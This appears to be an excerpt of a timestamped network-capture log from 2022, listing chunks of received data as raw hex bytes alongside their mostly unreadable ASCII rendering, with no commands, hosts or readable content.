                                                                                                                                                2022-09-29 12:51:43 UTC16721INData Raw: 15 36 42 f5 59 0f 4e 68 f5 bb d2 10 bd cd 62 d3 98 54 cd db 1e 71 ba 79 23 24 8a ab 43 e3 28 22 e0 0b 44 8d 31 7b 0e 90 72 c7 95 d2 f0 cd ed 2c bb e7 36 80 d8 f6 dd 32 6a db a2 ca ec 10 f3 cc 73 16 01 ae f4 57 b2 ee 69 21 8a 6a 61 6b 63 58 90 67 66 d5 d8 56 ef 7a fe 57 0e 82 4b e5 97 dd 2f e3 b5 63 67 64 57 ba 64 ea 72 0b 96 e0 88 90 23 6a 40 66 74 a8 0d 47 65 69 d9 60 ed 0b 96 64 dc 0f 86 9c 3e a7 e7 83 f8 85 b9 9e a2 2d c1 00 f6 3e af 13 f3 33 9c 12 c7 4e 27 25 c6 69 06 36 2b bb 84 df f5 5e ac 3e c7 05 bd a8 8f b0 f9 24 47 f8 dd 66 30 13 26 b8 ac bb d6 90 fe 8c 3a f9 87 54 2f 3b 7b 4e fd dc 11 71 82 cb 54 86 c2 b7 17 f0 00 2e bc ac a0 5e 00 2c 29 69 e6 ae a7 72 93 9f 16 fd 88 55 04 2e 8e 3c 15 69 c2 15 a6 68 35 5b 32 4d 59 4b 56 1f 03 85 53 7b 0c 6d 5e
                                                                                                                                                Data Ascii: 6BYNhbTqy#$C("D1{r,62jsWi!jakcXgfVzWK/cgdWdr#j@ftGei`d>->3N'%i6+^>$Gf0&:T/;{NqT.^,)irU.<ih5[2MYKVS{m^
                                                                                                                                                2022-09-29 12:51:43 UTC16737INData Raw: f4 1c 36 9e de 03 d1 f5 0a bd 7a 7f 3e 68 54 80 78 bf 5b f7 e6 af 2d b3 dd 88 6b 92 7b 70 95 ee 0d f7 0a 1f 9d d9 55 12 f2 a4 64 73 20 6e 3c f2 4d 70 c7 ab c2 24 5d 66 b5 c6 96 28 53 b4 67 ae 69 8a 64 7b 2c 73 0c 6b 11 5d b6 b7 12 e3 cd e0 41 77 0a f2 cb 79 14 a2 e6 34 b6 d0 55 c8 8e 6a 70 fb c5 c2 71 4e c0 f6 6a d6 05 70 c6 61 29 88 7c 24 e6 cb 28 66 5d 4b 5e 08 3d 08 e8 91 39 72 c6 07 20 03 f7 29 5a aa 44 b9 d7 d6 b5 c1 90 05 54 76 b0 5a 8d 5e 0e f7 1a 12 ca f7 e3 7d 18 e2 c2 2c eb 36 29 43 f4 cb 12 da 58 92 d2 b6 3f e2 cc 6e 15 4c b5 af 46 07 e1 70 38 de b6 93 b5 0e 36 8d 83 97 c7 e5 f9 91 b6 77 c3 a7 42 dd 76 78 80 89 b4 78 2a b9 eb 2f cb dd fc 98 f9 a1 a6 b2 41 98 91 1f 3a 30 6b 90 71 cf 22 31 49 e9 3a 4e f2 15 87 7c 85 a9 50 9e 84 66 c0 d3 d5 73 01
                                                                                                                                                Data Ascii: 6z>hTx[-k{pUds n<Mp$]f(Sgid{,sk]Awy4UjpqNjpa)|$(f]K^=9r )ZDTvZ^},6)CX?nLFp86wBvxx*/A:0kq"1I:N|Pfs
                                                                                                                                                2022-09-29 12:51:43 UTC16753INData Raw: 37 36 fb bb 6c 26 d6 da b7 e5 35 4b f1 e8 89 dc c2 07 ef 23 4a 0f 31 35 71 3c 0e bb f7 a1 2f ae 0e 67 02 72 2c 56 93 ab 3d 9a aa 60 d3 6d 6f 3f bb 4a 24 52 4e 8b 7c 3b c2 2b 65 c8 6e 05 92 2c 4f e0 fc 91 b4 fa 2d 90 03 9d fe e0 aa fb 94 93 4f 95 cb 42 2b 5b 50 f9 44 ed f3 f6 16 c1 ff f7 0a 1c 3c 05 b3 f8 3e 1e ea 34 3a 33 c0 c2 24 ea b3 24 33 d6 4b 71 01 ad 2f b8 d8 03 a5 58 3e 39 84 02 77 3c 9b 9e 43 98 af 25 0d 4f 84 4d 26 30 61 a3 a4 1c 62 6a cf 35 c6 97 8d 67 19 56 81 92 9a 3d 86 ab f9 0d 06 77 9e 3a 95 d3 ed 4d cf ea b1 53 8a 3f 5c b7 a6 fb d4 26 16 21 55 43 13 36 20 a0 f4 ff c7 d2 1a 24 43 cf 76 dc 69 5a 57 73 2c 9d b7 fd ab f7 a4 fe 08 43 5e 7a 06 9f 42 f9 30 b6 f2 f9 54 4d 7e 24 b7 5b 78 f0 5c 18 cd 03 cd 45 d7 a7 6c 6f a3 64 e4 a8 48 f0 fa c1 88
                                                                                                                                                Data Ascii: 76l&5K#J15q</gr,V=`mo?J$RN|;+en,O-OB+[PD<>4:3$$3Kq/X>9w<C%OM&0abj5gV=w:MS?\&!UC6 $CviZWs,C^zB0TM~$[x\ElodH
                                                                                                                                                2022-09-29 12:51:43 UTC16769INData Raw: d7 9d f1 da f0 17 72 78 4e 7d 9a aa f9 af c1 9c 1a 65 13 20 2f 0e 8a d8 df 38 6f a7 47 cc 07 86 f5 86 b2 6a ac a6 ee b7 cb d6 70 10 43 ff 62 29 71 53 8b 01 b9 14 16 e3 1a 7c 45 f8 85 a4 e7 da 68 e0 1e 9d ff ed da d9 2f 86 28 21 fe 29 fa 6f 8b db 64 ec ca ed aa d2 18 47 de a4 47 dd 20 c0 a9 e8 6e 78 31 06 14 84 ec ac ad 10 46 18 64 e3 40 e1 bd b8 e6 9f 08 38 f7 25 95 78 9d 0e fd 23 7e fd d2 b3 b3 79 e7 04 29 ed f5 dc 6e 12 c6 67 f3 c4 71 ca 3a b0 be 44 af 90 5a 2a 7a 66 7f 5b 4e b9 d2 b7 d9 93 7d a4 59 95 c6 d0 41 90 67 c2 be 55 6e 69 e2 f1 43 3f 3c 6c 32 17 75 ac 28 7c b3 74 70 3d 9b a4 b2 b8 77 a5 de 68 82 a4 08 37 cd ae 98 51 ea 07 2d bd 20 06 90 da 2e 15 99 35 e2 fb e3 b8 55 c0 45 8e cd 27 87 f9 11 6e 4f e5 81 4f 04 fa 7c 79 24 35 fb 1a ff d0 20 46 da
                                                                                                                                                Data Ascii: rxN}e /8oGjpCb)qS|Eh/(!)odGG nx1Fd@8%x#~y)ngq:DZ*zf[N}YAgUniC?<l2u(|tp=wh7Q- .5UE'nOO|y$5 F
                                                                                                                                                2022-09-29 12:51:43 UTC16785INData Raw: 6a 6d c3 36 e7 e4 09 23 5d 77 33 65 f9 4c 84 e3 d5 d1 66 d9 10 65 a8 58 59 25 17 bb d4 29 7c bd 05 be aa 24 27 89 50 f0 fa c3 b7 91 51 3e d9 a4 71 37 b0 6d 38 27 f2 75 4f 17 af 00 f7 c6 63 11 78 48 18 09 cb 02 6b d8 fc 3e ec 98 1c 76 f9 83 fe 21 1a 2a dc 65 3c 63 df ae 12 6d ac 8d a2 c6 9c 0c df 01 be ed c0 86 81 a6 83 31 e1 ab b0 89 d8 f5 ae 63 c4 a6 f4 8c fa 65 4a 49 46 49 19 bb 4d 2a 17 91 09 bc 66 0f 76 27 3f 87 22 32 4d c7 6f 33 ac e1 26 09 29 92 39 53 9d 69 36 9b fc f5 55 a2 1d 96 b2 f6 98 3d 92 03 9c f9 3a b4 c8 20 a6 33 16 fb 7c 55 e8 37 37 04 fc c6 5a d3 38 9f 7a 5b 19 77 05 89 e7 56 c5 84 38 55 57 58 be 57 35 38 c6 ae 33 c8 a5 9e 68 30 c2 ea a6 63 51 55 63 8f 04 4c e8 0b da 72 5c c4 52 82 7f 92 59 bc 15 c6 26 2a bb 4b ec e2 89 10 c0 4c 1c d7 ec
                                                                                                                                                Data Ascii: jm6#]w3eLfeXY%)|$'PQ>q7m8'uOcxHk>v!*e<cm1ceJIFIM*fv'?"2Mo3&)9Si6U=: 3|U77Z8z[wV8UWXW583h0cQUcLr\RY&*KL
                                                                                                                                                2022-09-29 12:51:43 UTC16801INData Raw: 22 8a cb e4 dc 33 27 78 bf af ee dc f0 5f a7 7f d0 4c 90 99 43 a2 ce c9 2b 3e 4f 5d 46 07 d2 ca 57 db 14 6a 0b 96 48 c7 dd 43 45 76 38 3c cf 93 09 8e 2b c5 ff 7e d1 f2 37 85 10 89 d9 32 e6 35 02 60 2d 98 53 ee 74 73 b2 ed d1 d7 74 c3 6b e8 3f 10 7d 3c d5 80 3d fa d2 d9 d5 9e ae 68 c4 63 f6 0e 83 aa 61 60 f7 cc 80 98 be cb 97 a3 aa 61 d4 28 ba 84 50 95 d7 a8 40 e5 09 5a 29 2d f7 37 6d 18 42 d9 4f 62 44 7f 87 ff 05 1f 89 41 44 fd 05 02 49 50 6d a7 49 78 b4 ea f2 9a 63 42 f9 f6 e4 6b b5 6f 20 57 df 80 1b 56 95 f4 27 47 2f d8 b0 4f 70 f7 94 84 3c 44 94 4e 82 b0 46 af 9f 94 26 85 56 3d 7c 6c e8 55 c2 55 af b9 a4 ee 64 92 f0 3f ed 30 b9 41 84 a0 8f c4 27 81 3e d6 bd 1f 1a 3f 1f c0 53 5a f1 35 3d e4 23 92 50 d8 b1 86 cd b6 e4 3c 2d e0 b9 05 0e be d3 de 51 23 91
                                                                                                                                                Data Ascii: "3'x_LC+>O]FWjHCEv8<+~725`-Ststk?}<=hca`a(P@Z)-7mBObDADIPmIxcBko WV'G/Op<DNF&V=|lUUd?0A'>?SZ5=#P<-Q#
                                                                                                                                                2022-09-29 12:51:43 UTC16817INData Raw: 2c 1b 38 43 eb f0 60 6c b1 d4 48 f7 cd 57 08 93 77 a5 42 85 70 b7 0e 8c b0 f1 1f 48 34 50 40 9d 77 fb 3e 40 97 32 ba 01 c5 54 a9 b4 d4 cb 02 97 fa 75 2e 7c ad 84 44 17 bc 82 a6 65 b9 bb e1 e1 e9 25 ed b3 d5 27 66 8e 50 ad ab 3d ba 88 53 a1 26 8e 8a 67 06 35 f4 cb 60 25 e3 03 43 99 a9 f8 87 fe d2 19 32 33 c3 28 7e 48 cc f8 6e 79 95 d0 b7 22 1e 83 e4 45 3f bb 8f db cb 97 49 d9 18 1d 18 ab 06 24 a3 d7 61 03 aa 7b 9b 0b 14 3a 68 60 e0 a3 1a 85 e6 d9 2f 74 2b a6 6a 67 73 0f b6 fc 55 27 a9 df 35 36 0d 6a 00 b1 47 03 ec d0 77 b3 2e a9 08 6c 9c d2 1e 8b 7f a5 5a cd 8c 4d 11 99 54 d8 d5 5a 42 41 20 62 66 d5 61 b4 20 14 02 9a 55 b2 ce 35 b9 f6 76 5a ea fe be ff 70 fc c9 bd 63 77 61 09 bd 4f 0b 6e fd c5 fd 27 a3 39 e2 a7 fe ad 0d d3 19 2e 77 35 a1 20 a5 cc 28 89 eb
                                                                                                                                                Data Ascii: ,8C`lHWwBpH4P@w>@2Tu.|De%'fP=S&g5`%C23(~Hny"E?I$a{:h`/t+jgsU'56jGw.lZMTZBA bfa U5vZpcwaOn'9.w5 (
                                                                                                                                                2022-09-29 12:51:43 UTC16833INData Raw: 56 5a 1a 09 24 92 74 15 7a 9e 45 55 20 9b cc 84 d0 a5 54 95 1b d0 09 80 85 f4 9e cc de e1 9a 40 0b 7d c7 cf 78 50 b4 d5 31 85 1f e5 26 b1 98 3e 66 35 14 51 85 9d 70 a7 be f9 8e de 2d c5 7d 6c 4d 51 9b 29 cf 86 6b 0f 16 04 94 9d ae d8 fe 3d 4c 09 13 18 62 54 ce 52 69 c1 5a 44 8b 2b 88 d5 fc 0c a0 a8 c3 cd 2a b7 84 01 23 4b 67 06 42 fa 55 0e 5c de 8e 1c 04 bf 7b 2d 8c 4c 9e be 3d ba 39 45 44 ed 45 3a 9b ff 16 4a ca 81 50 ff 8c 90 53 7f 72 e9 e8 12 87 1c 8f 98 e6 1e e2 f4 89 72 d7 29 b9 59 51 b8 04 fc ef 3b 7b cb 44 1c 29 e5 9e a5 80 1a 43 a6 46 75 0a 68 59 71 35 3c 31 eb c0 39 5f 2e 7f 8d 25 fb 01 a6 dd 6a de 64 0d 1b ff 66 fe 8b 4c df 85 9e 0e d8 5c 21 03 3d c4 b8 4e 3b 32 9f 26 f4 f1 2a 0b 12 00 73 a8 22 3e 94 4e a2 54 6c 36 cb f1 dc 6b a9 ad e9 1c 65 23
                                                                                                                                                Data Ascii: VZ$tzEU T@}xP1&>f5Qp-}lMQ)k=LbTRiZD+*#KgBU\{-L=9EDE:JPSrr)YQ;{D)CFuhYq5<19_.%jdfL\!=N;2&*s">NTl6ke#
                                                                                                                                                2022-09-29 12:51:43 UTC16849INData Raw: 9d 9e 03 62 89 d0 b7 ec 1c 11 a0 8d 72 e6 4b 4e 14 84 b6 53 8b bf 1a 3c eb 57 da d1 3c 1a 20 a9 28 d3 e1 f1 6c d1 9c 65 c8 f0 13 65 cc c3 fa 0b 50 3f 0c 02 be 0d cf 8f 9a 77 7c e9 34 95 19 92 cf 7e d3 07 6c 94 4b 29 dd 4d 9b e2 77 59 e5 ea 4b 30 89 69 d3 ab 22 fa 00 c2 9d 2a 8d 78 06 ee a7 ee 8a 26 9e 73 41 9a 96 67 52 f7 a4 1f d3 46 93 7e 75 1b db f2 8c 45 a4 17 3b b6 d4 03 a4 f7 28 7d 83 33 00 5a 09 25 b5 1f 84 e9 90 38 b4 f1 7a 5c 5e 72 d1 fa eb 82 0f 76 3e 2b 59 b0 f6 5a 85 56 63 b8 db 35 87 91 f4 a4 87 5c aa 33 30 7c 05 70 75 dd da 8d 78 52 cd c7 e6 91 3d 54 3e f0 7c 9f 29 0e 02 41 75 f5 ba 4e 8e 1d 1d 5a b3 a9 a0 6c fa 28 60 37 4d 14 dc f8 80 79 4f 45 27 58 64 08 61 f7 a6 8a 03 b8 3f 7b 6e f2 87 3b c3 a4 b1 4f b5 af bf a2 a3 d3 db 45 7d 7d e3 c8 9a
                                                                                                                                                Data Ascii: brKNS<W< (leeP?w|4~lK)MwYK0i"*x&sAgRF~uE;(}3Z%8z\^rv>+YZVc5\30|puxR=T>|)AuNZl(`7MyOE'Xda?{n;OE}}
                                                                                                                                                2022-09-29 12:51:43 UTC16865INData Raw: 97 ad f9 87 12 a6 ea 29 34 41 16 94 61 ae 70 09 36 d0 11 0d d9 78 95 5c 0e cb a7 78 36 4e 8b e1 8a 08 49 86 70 fb 16 0e f2 c2 e1 6f d0 0f 3c 49 a7 7f 91 07 01 73 b7 62 c6 c3 72 f7 65 ae 9d 6d 7e 5c 7e 6c ce f0 84 22 43 78 7c 7f 58 ac e6 b3 8a e1 00 a1 23 bf 7a ff a3 01 48 d8 84 50 72 99 d5 f6 17 b7 7d 1a 19 73 24 43 88 29 24 45 b4 70 35 26 4b bd 50 98 2c a9 ac 45 83 1d 6d 62 a7 6d d9 73 bd 53 e1 68 58 8a c0 a6 38 d6 ea e1 62 13 fd 04 7d a8 a1 4c 8f 7e 4c 51 f2 cd 36 aa a1 29 04 ab d3 45 8c 98 ef bb 81 fb 7c e3 8c 10 11 83 c9 95 27 10 0a 9a cf d8 b2 b1 de 08 77 a1 ec d5 f6 65 53 d0 5c 43 01 89 8d 44 97 33 cc 6b 94 48 d5 5f 65 91 2b fb 17 a8 ea 96 a4 5c 44 7e a1 fb cd 5c 47 52 18 d4 9a ad 14 b4 48 e5 ee 88 2c c3 0c 41 20 19 d5 37 50 4f 68 ad fc e2 9b f3 74
                                                                                                                                                Data Ascii: )4Aap6x\x6NIpo<Isbrem~\~l"Cx|X#zHPr}s$C)$Ep5&KP,EmbmsShX8b}L~LQ6)E|'weS\CD3kH_e+\D~\GRH,A 7POht
                                                                                                                                                2022-09-29 12:51:43 UTC16881INData Raw: 4a 22 58 bc fc 1a 39 30 c2 d7 3c cd 2d 06 44 47 da 4a f6 6d 9f 36 4d 4a 90 99 07 82 a0 23 94 15 95 fa fa 73 00 8d f5 a4 30 9d 9a 07 8d 33 ec d0 e9 ff 3d 93 8f 15 31 73 c9 9f 6e 56 cd 21 85 af de a9 be 6e 67 a3 0a 76 47 6f ad 67 e6 3f b2 d3 c9 ec 8f f3 3b 08 5c 7c b9 d4 79 03 06 f0 34 9c 9c 8d 8e bc bb 3f 74 ed 80 50 97 18 33 31 0a 18 85 34 2e 41 94 91 59 26 56 9d 74 9c b8 8f b6 ba 41 48 da 32 3b 5b 67 20 ae a2 69 b2 f3 51 66 e6 9c 63 5c 13 7d 8b ea 43 e7 d0 13 4c 4d 73 98 56 8a 88 d3 ae 65 f6 64 9c f3 a1 9d 03 2c 0b fd 1b 01 41 35 fb 10 20 dd d5 a8 ba 34 e1 37 3a 8d 19 2d 81 ff 41 a6 07 6c 74 5b 91 57 d6 8b 52 6c ff 9f 6d 27 cd ef 98 4e cf 75 a6 6f 7b ed 62 1c 72 51 e3 2d 0e 3d 4c e0 f6 1f 72 78 41 cd 2c 29 c8 a5 1b 99 3e 93 09 2f 1b 74 6f 38 7b 84 5d f4
                                                                                                                                                Data Ascii: J"X90<-DGJm6MJ#s03=1snV!ngvGog?;\|y4?tP314.AY&VtAH2;[g iQfc\}CLMsVed,A5 47:-Alt[WRlm'Nuo{brQ-=LrxA,)>/to8{]
                                                                                                                                                2022-09-29 12:51:43 UTC16897INData Raw: 92 ca fe 84 4a c4 9b 5d 9a a1 7b 66 c8 ec c2 5c bd 35 39 65 a2 52 ac 95 32 43 cd 01 e7 a6 b4 1a 21 17 49 ab 05 23 ea 0a 9f df cf b0 f9 5c 2c eb 58 44 bd 93 15 2a 09 0e a9 52 52 33 60 99 f2 44 90 41 39 88 eb c3 c9 7a d3 18 3e aa cc c0 f3 6c 50 01 ae 42 c2 3e 8f d8 44 1a de 42 42 96 aa 54 71 fa c7 59 d9 38 ce d5 0b 7e d9 20 cf 74 c8 1d 63 04 e5 07 e8 70 2d a2 0e 4b dd 47 ef d0 9f 69 8f e9 9c 63 89 85 49 2d f4 ce 3c 6a 17 52 dd aa 19 d3 97 d5 f2 6b 0d 9a 13 d8 e9 0f 25 46 74 bb aa 8d 8b 51 65 fc 01 fb 77 5b c1 76 a4 d0 52 e7 2d 67 e8 3c a2 0c 89 40 17 98 47 e3 fe ce 40 6d 56 12 0e 21 7e 81 7e ad eb 90 63 71 88 77 04 dd 5e b0 89 43 91 7b f9 b8 eb 92 19 52 3c bf 69 17 eb 9a 28 be 13 40 b4 34 ef 77 6a d2 9d a1 f3 8a 7b 8a 4a 5d ab 39 bb 50 66 80 7c 82 f0 64 6b
                                                                                                                                                Data Ascii: J]{f\59eR2C!I#\,XD*RR3`DA9z>lPB>DBBTqY8~ tcp-KGicI-<jRk%FtQew[vR-g<@G@mV!~~cqw^C{R<i(@4wj{J]9Pf|dk
                                                                                                                                                2022-09-29 12:51:43 UTC16913INData Raw: a9 0f 9f 3c 23 03 27 8b 6d 01 5a 3c d9 18 e8 d8 3a 85 d7 b0 d8 dd af fd 99 e7 f8 26 91 54 a3 05 d4 69 c4 30 5c ee 63 d7 15 1e 3e a0 65 6e 75 d6 7f 26 f0 9f 95 60 34 24 78 8c a4 42 30 58 df cb c1 de f5 64 be 3e 55 d5 c5 ba a4 26 1f 94 cb 58 7d 91 c7 34 6e 79 ec 66 27 5b d7 88 2f 61 31 e8 bf ea d8 48 69 c6 96 15 c5 33 84 21 36 8e d7 b8 05 bd 61 48 27 28 3a 78 b6 52 bd 39 2a 27 6a da 9e 84 12 ce 28 05 89 67 b7 7c 8e 0d e0 f4 bc 9f c7 1e 3e 4b ae f8 b1 b8 68 8f a2 13 ab 6e 26 7e 10 6d 7d f1 3a 8c ae 81 07 9e 41 25 59 b4 e7 68 2b f7 13 db 0e b7 c1 6d 3e e5 b6 d8 51 96 eb 5e b0 55 95 e7 02 75 20 f0 3d ff e5 09 3f 8d 70 bd 79 b5 53 18 95 a0 e6 47 01 c8 86 e1 a0 55 37 d3 be a7 17 8b f2 c7 e2 bb 8f cc 66 28 ec ac 4d ee 18 e0 34 63 e7 4f b7 46 76 49 61 18 81 e3 85
                                                                                                                                                Data Ascii: <#'mZ<:&Ti0\c>enu&`4$xB0Xd>U&X}4nyf'[/a1Hi3!6aH'(:xR9*'j(g|>Khn&~m}:A%Yh+m>Q^Uu =?pySGU7f(M4cOFvIa
                                                                                                                                                2022-09-29 12:51:43 UTC16929INData Raw: 55 3f 32 99 a6 e6 77 16 16 50 fb 6a fa fb 73 5c 87 c7 42 77 bc 24 44 ce 48 12 a4 14 c5 eb d0 73 48 16 af 13 8d c1 31 bd 3a 28 62 1d 97 9a 26 f0 72 69 d9 61 13 e8 13 f3 56 0d e9 b2 e6 e2 ba 88 8a 47 bb 6a 02 99 aa 85 a4 d3 12 bd e1 9a 2a db 56 05 bb 30 de ee 10 a9 87 85 0b da 0e 27 26 16 b0 2a 11 cf 0e ba 61 03 ab 50 8b 48 f1 f4 ad 64 ff b9 27 fe f9 50 18 e6 9a ec 7b 45 6c 93 8d 33 5c b8 30 ee 2b ae 66 06 24 7e 53 67 a8 73 1a fb 40 61 fd 81 74 00 47 69 63 51 ee 90 5d 18 20 ea c1 57 81 1e ad d4 dc 8f 5c df 15 d6 72 55 5b 05 0b 04 b4 c7 af 76 4f 49 b0 9c 0a 31 3d db f3 24 6d 96 4d c0 af 85 5e 93 3b 70 5d d7 52 5e ed e5 6d 2e 8e 16 f9 89 07 d2 c2 ce 2c 29 5c 39 4a a2 53 20 d1 a4 b5 17 98 f2 48 f2 ba 9a 8c 49 c7 56 f6 29 b9 9e ee f6 61 22 36 91 8d 72 f0 a7 67
                                                                                                                                                Data Ascii: U?2wPjs\Bw$DHsH1:(b&riaVGj*V0'&*aPHd'P{El3\0+f$~Sgs@atGicQ] W\rU[vOI1=$mM^;p]R^m.,)\9JS HIV)a"6rg
                                                                                                                                                2022-09-29 12:51:43 UTC16945INData Raw: 7e 35 fc 19 cb 71 99 99 75 13 20 b6 9f 6e 7a 3a 2b 7c 3b 92 ca ca 25 30 db 47 78 36 6c f6 49 fb 59 09 dd 25 c9 7e 9e 43 2b c9 52 97 5c 9d 15 bf e9 8f ea a8 49 c9 4b a6 da c4 01 a2 ed 00 a9 be a4 f2 a0 45 b7 d4 d1 e1 e8 66 fd 9d 61 b0 8d 2d e4 ce 8b 43 b9 8c a6 48 42 f3 5b e1 e5 8e a2 c5 f0 80 c1 7a f7 51 9a ac d0 00 60 91 67 18 cd 36 19 8d c4 91 e3 d2 91 a1 62 9c 6c c0 82 b8 6c 50 f1 e3 82 46 32 ca 28 a3 63 ee 12 30 66 2f 38 28 f4 49 79 e3 c2 5b 7b 89 25 e4 3f 32 65 3f 55 32 93 31 71 1c 79 99 42 c4 fb 76 99 63 d0 b1 0f a9 f5 5e 19 ca d4 04 e2 b1 6e 99 c2 5b 4a cf 91 db fd 47 8f 1f 15 3d 4e 36 77 30 b0 b6 1a 64 7d 82 56 c2 1d 8e 5d 6e 5f 5d d8 eb 0d 30 bb 67 b5 62 33 39 86 8b cd 8a c8 94 b0 fb e6 8e 32 f6 d7 b4 44 13 ca e0 71 7d 49 6a 1e 2d bd b4 27 70 54
                                                                                                                                                Data Ascii: ~5qu nz:+|;%0Gx6lIY%~C+R\IKEfa-CHB[zQ`g6bllPF2(c0f/8(Iy[{%?2e?U21qyBvc^n[JG=N6w0d}V]n_]0gb392Dq}Ij-'pT
                                                                                                                                                2022-09-29 12:51:43 UTC16961INData Raw: 17 b9 e4 1f 43 22 63 1d 67 8f 06 ee 85 ea a3 f5 53 db f3 be 7c fe d9 f2 28 e4 20 b6 9c 07 cc 45 18 61 4a e9 03 14 62 3b 52 f0 bc df 50 ff 74 a2 13 df 8f 46 25 44 e0 eb 1d b9 e1 71 bc f5 18 5a 00 c5 f8 e1 65 b3 d1 14 38 96 b6 7f 98 24 52 f6 7e 97 47 c4 b5 40 0c 7e a9 aa a8 42 f5 20 66 c1 34 56 a2 34 f7 0d 6b ea f2 9f 5e 0c be 59 22 e9 d8 c5 a0 e7 e7 36 5a 33 71 fa 63 6c 66 8c 8d a7 1a f4 da b2 0f d5 31 80 3b 48 46 1d a2 45 c4 e2 66 e6 66 16 6c 2c b0 a1 cc fb 9b 10 a9 50 30 fd 79 60 16 ee f3 6c 34 79 fd c0 95 e4 04 8c 0f 09 ec cc 5f 4a 11 72 9a 95 7a b9 2c 1e 18 7f 67 28 7e ec 91 8b 58 9c 80 ec 6c 90 9b ea 55 98 e3 c7 68 d2 69 ca f3 6f 0f 93 8c f0 fc 9f 32 93 73 52 dd 7a ab e4 d6 4e 0f 4b da 6e bd 02 2f 8f 61 01 7e 30 42 0d df 37 20 19 6c ba 49 44 96 74 e3
                                                                                                                                                Data Ascii: C"cgS|( EaJb;RPtF%DqZe8$R~G@~B f4V4k^Y"6Z3qclf1;HFEffl,P0y`l4y_Jrz,g(~XlUhio2sRzNKn/a~0B7 lIDt
                                                                                                                                                2022-09-29 12:51:43 UTC16977INData Raw: b1 ad 1a 7f d9 55 49 84 5a ff 22 98 31 9f e5 c3 ed 14 9e 6e 6e 5d 9f f8 a8 98 64 18 2d fa 2b 54 a0 af a2 fc 19 05 6a cb 2c 4e a3 3a 7c a5 d3 a5 ab 95 33 91 66 ad 49 e7 3b 83 a6 47 ed 03 7a ee 1e ac cc cd 0e f6 7a 92 f8 e9 dc b9 ba 9d 37 eb fe 9d 16 07 05 52 44 ee e6 15 c9 c6 54 3d 9f 60 3a d8 aa 93 e2 78 16 e2 98 02 81 2f 97 d5 1d d6 f3 e3 d5 e9 7f 3b 6d 5b a3 aa 3a fc a2 a6 3d 99 34 d5 41 66 e3 80 39 fb 99 b8 39 35 3c 56 dc 38 ff 6e 44 cf c5 3b 09 e9 33 a2 e3 06 4a 82 72 c1 c1 23 ab f8 56 e3 3f 47 be 32 7a b7 4d 8c de 6d 32 87 22 88 7e d4 24 87 80 63 45 54 34 20 f5 ca 1a 34 1e 31 a3 6a dc 77 0f 48 48 f6 f4 a1 e9 d6 c7 9c 4a 00 3d 33 65 b8 ff 85 bb 6a 14 21 ed e0 4b cb a3 e8 f7 c8 89 dd 12 19 f7 69 91 09 85 a3 53 07 1b a3 02 f6 16 13 2b 6d 02 72 fe 28 48
                                                                                                                                                Data Ascii: UIZ"1nn]d-+Tj,N:|3fI;Gzz7RDT=`:x/;m[:=4Af995<V8nD;3Jr#V?G2zMm2"~$cET4 41jwHHJ=3ej!KiS+mr(H
                                                                                                                                                2022-09-29 12:51:43 UTC16993INData Raw: da 3f 03 8f 69 1c aa 23 f3 c1 36 d1 86 c7 2c 32 cc 09 0f d1 2f dc 2f 2c e6 08 df 2c 59 92 48 f5 3e 40 e0 ff 85 d6 1e a8 f4 94 3e 7c 95 10 66 ee 49 72 9d 3c f6 d7 5e e9 8e 6d ec 7e a7 06 fa ef 1e 0d 2a 55 d6 85 03 bf f7 3a 47 ba 7f d6 a5 37 91 46 54 de f7 5d d1 33 7a 25 b3 6d 0c 8c d0 4f 40 a0 89 40 08 ab 7c ee 04 2e 77 1a a5 77 26 7e 1c 61 f5 51 2d f5 74 d1 81 82 a3 dc 38 54 86 56 30 6c 1f ee 5e 91 fe 04 e4 7a 4e 9b d2 1c 66 90 46 af 27 31 45 b4 55 a0 95 dc c0 8e b2 0b 38 36 93 e0 57 16 3b 78 37 3b 8b ae 0d 0b d7 06 62 c7 50 7b fd bf 4e 08 f4 cb 65 89 26 ed 3e 01 88 2d 66 d6 7e b7 56 7a f8 84 0b 67 f1 95 20 1f ab 77 0e bd 2f fa bc e9 51 cd cb 0d 29 f0 e9 b2 45 6e 50 d9 f8 25 9c 81 9c 58 5c a4 7e d9 c2 27 1d 29 03 05 8a 49 5b 9d a1 2f 08 c4 9b df 49 d6 16
                                                                                                                                                Data Ascii: ?i#6,2//,,YH>@>|fIr<^m~*U:G7FT]3z%mO@@|.ww&~aQ-t8TV0l^zNfF'1EU86W;x7;bP{Ne&>-f~Vzg w/Q)EnP%X\~')I[/I
                                                                                                                                                2022-09-29 12:51:43 UTC17009INData Raw: 34 4a c1 98 ad 6b 20 5e 54 12 ea a8 ad be 3a 6a c4 32 c5 68 30 5d b2 fd fe 53 a3 ac e4 53 4d 1b 5a 9c b2 24 1c e1 e6 56 1e d3 8f 62 94 fc 0a 93 91 63 b1 32 29 e3 88 2d ee 29 67 d5 db 65 9b c5 5f 11 0d 53 80 50 8d eb 14 7b 32 d9 e4 4d 90 4b a8 e7 7c 29 07 2e 78 06 cf 4a 3b 58 12 b9 13 58 86 99 fe f6 29 b8 6a 6a 01 2d 74 49 7c b4 ec ce af 8e 92 89 e3 8e c9 9f e0 58 50 49 29 2f c9 0c 87 92 85 df c3 e1 67 b9 8c 9b 5e 90 0c 06 8c e1 70 5d fd f2 26 2c 93 c9 c4 8c 58 32 da 1c 26 c2 32 e9 81 86 5c c6 64 59 ce e5 b3 e1 34 91 bc 60 dc d3 03 c5 b1 87 52 0c dc 2c 68 90 96 b3 88 b9 02 45 96 de 1a 3f 5e ad 3d 89 d1 2e b6 85 16 51 26 1a 96 81 9b f5 8a 1a 5f 67 07 23 95 f8 1b 07 b7 b0 8b 85 fc 82 3d b4 69 a4 ea c5 2a 89 72 f1 9b 63 ed d8 f5 af b1 96 5e 0e 84 c2 05 ad fd
                                                                                                                                                Data Ascii: 4Jk ^T:j2h0]SSMZ$Vbc2)-)ge_SP{2MK|).xJ;XX)jj-tI|XPI)/g^p]&,X2&2\dY4`R,hE?^=.Q&_g#=i*rc^
